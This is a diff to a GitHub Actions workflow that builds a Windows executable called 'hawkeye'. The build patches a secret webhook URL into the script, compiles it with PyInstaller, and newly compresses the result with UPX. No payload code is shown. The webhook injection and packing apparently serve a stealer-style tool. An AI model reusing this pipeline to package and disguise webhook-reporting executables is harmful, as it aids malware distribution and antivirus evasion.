--- a/.github/workflows/windows.yml
+++ b/.github/workflows/windows.yml
@@ -11,6 +11,11 @@ jobs:
         steps:
         - name: Download code
           uses: actions/checkout@v3
+        
+        - name: Install UPX
+          uses: crazy-max/ghaction-upx@v2
+          with:
+            install-only: true
 
         - name: Patch script with webhook URL
           run: python3 .github/workflows/webhook_patcher.py __main__.py hawkeye_placeholder_webhook ${{ secrets.HAWKEYE_WEBHOOK_URL }}
@@ -20,9 +25,12 @@ jobs:
             python3 -m pip install pyinstaller
             pyinstaller -F __main__.py
             move dist/__main__.exe hawkeye_pyi.exe
+            upx --best hawkeye_pyi.exe -o hawkeye_upx.exe
         
         - name: Upload as artifact
           uses: actions/upload-artifact@v3
           with:
             name: build_windows
-            path: hawkeye_pyi.exe
+            path: |
+                hawkeye_pyi.exe
+                hawkeye_upx.exe
